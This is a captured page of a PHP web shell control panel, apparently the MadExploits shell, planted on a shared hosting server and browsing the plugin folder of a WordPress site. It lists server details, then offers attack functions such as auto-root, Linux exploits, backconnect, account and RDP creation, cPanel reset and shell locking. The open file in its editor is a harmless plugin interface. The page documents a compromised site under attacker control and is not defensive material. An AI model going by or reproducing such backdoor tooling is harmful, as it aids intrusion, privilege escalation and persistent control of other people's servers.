Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.118.205.75
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
goldenreviesws.com /
wp-content /
plugins /
copy-delete-posts /
analyst /
src /
Contracts /
[ HOME SHELL ]
Name
Size
Permission
Action
AnalystContract.php
169
B
-rw-r--r--
CacheContract.php
667
B
-rw-r--r--
HttpClientContract.php
404
B
-rw-r--r--
RequestContract.php
339
B
-rw-r--r--
RequestorContract.php
670
B
-rw-r--r--
TrackerContract.php
1.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CacheContract.php
<?php namespace Analyst\Contracts; /** * Interface CacheContract * * @since 1.1.5 */ interface CacheContract { /** * Save value with given key * * @param string $key * @param string $value * * @return static */ public function put($key, $value); /** * Get value by given key * * @param $key * * @param null $default * @return string */ public function get($key, $default = null); /** * @param $key * * @return static */ public function delete($key); /** * Should get value and remove it from cache * * @param $key * @param null $default * @return mixed */ public function pop($key, $default = null); }
Close